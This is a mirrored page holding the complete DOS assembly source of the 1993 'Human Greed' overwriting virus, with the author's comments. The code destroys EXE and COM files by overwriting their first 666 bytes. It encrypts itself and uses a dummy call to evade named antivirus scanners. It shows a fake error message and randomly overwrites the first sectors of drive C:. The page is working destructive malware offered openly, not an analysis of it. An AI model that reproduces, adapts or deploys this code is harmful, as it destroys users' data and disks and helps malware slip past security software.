mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
234 lines
8.0 KiB
NASM
234 lines
8.0 KiB
NASM
; VirusName : Human Greed
|
|
; Origin : Sweden
|
|
; Author : The Unforgiven
|
|
; Date : 20/12/93
|
|
;
|
|
; This is a "mutation" of the Infernal Demand virus, written by Metal
|
|
; Militia. Even if it's high modified, its ground is still the same.
|
|
|
|
; This is yet another of this simple overwriting virus, and it's
|
|
; nothing really to scream hurray for. This virus will search for
|
|
; exe or com files on drive C:, and then overwrite the first 666
|
|
; bytes, and therefor permantely destroy the victims. It used the
|
|
; "dot-dot" method for changing directory, and when all files are
|
|
; infected (overwritten), it will return to the original directory.
|
|
|
|
; The code is encrypted, thus making it hard to detect. Scan,
|
|
; MSAV, CPAV, FindViru, F-prot and TBScan can't find a shit.
|
|
; Yes, Tbscan used to find this as the "Infernal" virus, but he
|
|
; with his 90% (nice try!) failed again!, how patetic!
|
|
;
|
|
; If a infected file is being run, it's 50% that it will display
|
|
; this stupid "Program to big to fit in memory" message. Then
|
|
; if the message is printed on the screen, it'll throw the dice
|
|
; once more. If the number are 10 or lower, it'll simple wipe out
|
|
; the first sectors by overwrite them on your C: drive. This means
|
|
; that for each run, it's 5% that it'll "go-off".
|
|
|
|
; The "message dump" to a file under c:\ has also been deleted.
|
|
; And the new routines wich are included are, encryption,
|
|
; get/and restore directory, the randomizer, print faker, and
|
|
; of'cos the trash routine too. Hope you enjoy the code!
|
|
|
|
;===============================================================================
|
|
; **** HUMAN GREED ****
|
|
;===============================================================================
|
|
|
|
cseg segment byte public
|
|
assume cs:cseg, ds:cseg
|
|
org 100h
|
|
|
|
virus_start:
|
|
call encrypt_decrypt
|
|
jmp encryption_start
|
|
|
|
write_virus: ; write the virus to the
|
|
call encrypt_decrypt ; files, by overwriting
|
|
mov dx,100h ; its beginning
|
|
mov ah,40h ;
|
|
mov cx,666 ; How sadistical??
|
|
int 21h ;
|
|
call encrypt_decrypt ;
|
|
ret
|
|
|
|
encryption_value dw 0
|
|
encrypt_decrypt:
|
|
mov si,offset encryption_start
|
|
mov dx,encryption_value
|
|
mov cx,(end_of_virus-encryption_start+1)/2
|
|
|
|
xor_loop:
|
|
xor word ptr cs:[si],dx
|
|
add si,2
|
|
call fool_scan_for_TridenT_virus ; must call this meaningless
|
|
loop xor_loop ; routine, otherwise, infected
|
|
ret ; files will be reported by
|
|
fool_scan_for_TridenT_virus: ; SCAN as the "TridenT" virus.
|
|
ret
|
|
; just return.
|
|
encryption_start:
|
|
; get current drive
|
|
mov ah,19h ; get current drive
|
|
int 21h ;
|
|
push ax ;
|
|
; move to c:
|
|
mov ah,0Eh ;
|
|
mov dl,02h ; drive C:
|
|
int 21h
|
|
|
|
; get directory.
|
|
mov ah,47h
|
|
xor dl,dl
|
|
lea si,[bp+infernal+2ch]
|
|
int 21h
|
|
|
|
great:
|
|
; find first files (starting .exe's).
|
|
mov dx,offset ExeMask ; offset 'EXEMASK'
|
|
mov ah,4Eh ; find first
|
|
int 21h ; via int21
|
|
jnc go_for_it ; jmp if no ERROR
|
|
|
|
; if no exe's was found, just infect.COM files.
|
|
mov dx,offset ComMask ; offset 'COMMASK'
|
|
mov ah,4Eh ; find first file
|
|
;
|
|
again: ;
|
|
int 21h ;
|
|
jc chdir ;
|
|
|
|
go_for_it:
|
|
mov ax,4300h ; Get attribute of file
|
|
mov dx,9eh ; Pointer to name in DTA
|
|
int 21h ;
|
|
|
|
push cx ; Push the attrib to stack
|
|
|
|
mov ax,4301h ; Set attribute to
|
|
xor cx,cx ; normal
|
|
int 21h ;
|
|
|
|
mov ax,3D02h ; Open file
|
|
mov dx,9eh ; Pointer to name in DTA
|
|
int 21h
|
|
|
|
jc next ; if error, get next file
|
|
|
|
xchg ax,bx ; Swap AX & BX
|
|
; so the filehandle ends up
|
|
; in BX
|
|
|
|
mov ax,5700h ; Get file date
|
|
int 21h ;
|
|
|
|
|
|
push cx ; Save file dates
|
|
push dx ;
|
|
|
|
mov encryption_value,50 ; encryption_value.
|
|
|
|
call write_virus ; write to file(s).
|
|
pop dx ; Get the saved
|
|
pop cx ; filedates from the stack
|
|
|
|
mov ax,5701h ; Set them back to the file
|
|
int 21h ;
|
|
|
|
mov ah,3Eh ; Close the file
|
|
int 21h ;
|
|
|
|
pop cx ; Restore the attribs from
|
|
|
|
|
|
; the stack.
|
|
|
|
mov dx,9eh ; Pointer to name in DTA
|
|
mov ax,4301h ; Set them attributes back
|
|
int 21h ;
|
|
|
|
next:
|
|
mov ah,4Fh ; now get the next file
|
|
jmp short again ; and do it all over again
|
|
|
|
chdir:
|
|
; change directory to [..] and start infect again.
|
|
mov dx,offset dot_dot ; offset 'updir'
|
|
mov ah,3bh ; change directory
|
|
int 21h
|
|
jnc great ; jmp to great if no ERROR
|
|
|
|
exit:
|
|
; Throw the dice..
|
|
mov ah,2ch ;
|
|
int 21h ;
|
|
cmp dl,50
|
|
ja real_quit ;
|
|
jmp print
|
|
|
|
; no, quitting time, yet..
|
|
|
|
print:
|
|
; first print message.
|
|
mov ah,09h ; Print Fake message.
|
|
mov dx,offset sign ;
|
|
int 21h ;
|
|
|
|
get_random:
|
|
; Throw of a die..
|
|
mov ah,2ch ; Randomize.
|
|
int 21h ;
|
|
cmp dl,10 ;
|
|
ja real_quit ;
|
|
jmp trash ; bad bad boy..
|
|
|
|
|
|
trash:
|
|
; Trash routine from Nowhere Man of [NuKE], thanks.
|
|
|
|
cli ;
|
|
mov ah,2 ; 2=C:
|
|
cwd ;
|
|
mov cx,0100h ;
|
|
int 026h ;
|
|
JMP REAL_QUIT
|
|
|
|
real_quit:
|
|
pop dx ;
|
|
mov ah,0Eh ; restore org. drive
|
|
int 21h ;
|
|
|
|
; restore directory
|
|
lea dx,[bp+infernal+2ch]
|
|
mov ah,3bh
|
|
int 21h
|
|
|
|
; time to quit
|
|
mov ah,4ch ; return to prompt
|
|
int 21h ; via int21
|
|
|
|
; some data.
|
|
|
|
ExeMask db '*.EXE',0 ; tought one, huh?
|
|
ComMask db '*.COM',0 ; what is this, hm
|
|
dot_dot db '..',0 ; '..'
|
|
Note db 'That is not dead '
|
|
db 'Which can eternal lie '
|
|
db 'Yet with strange aeons '
|
|
db 'Even death may die '
|
|
db 'LiVe AfteR DeATH...'
|
|
db 'Do not waste your time '
|
|
db 'Searching For '
|
|
db 'those wasted years! '
|
|
db '(c) 93/94 The Unforgiven/Immortal Riot '
|
|
db 'Thanks to Raver and Metal Militia/IR '
|
|
truenote db 'Maria K - Life is limited, love is forever... '
|
|
db 'Open to reality, forever in love... '
|
|
sign db 'Program too big to fit in memory$' ; fake message!
|
|
sadistical db ' ***HUMAN GREED*** The answer of all evil on earth! '
|
|
db 'Do You Belive? '
|
|
db 'Farwell!....'
|
|
end_of_virus:
|
|
infernal:
|
|
cseg ends
|
|
end virus_start
|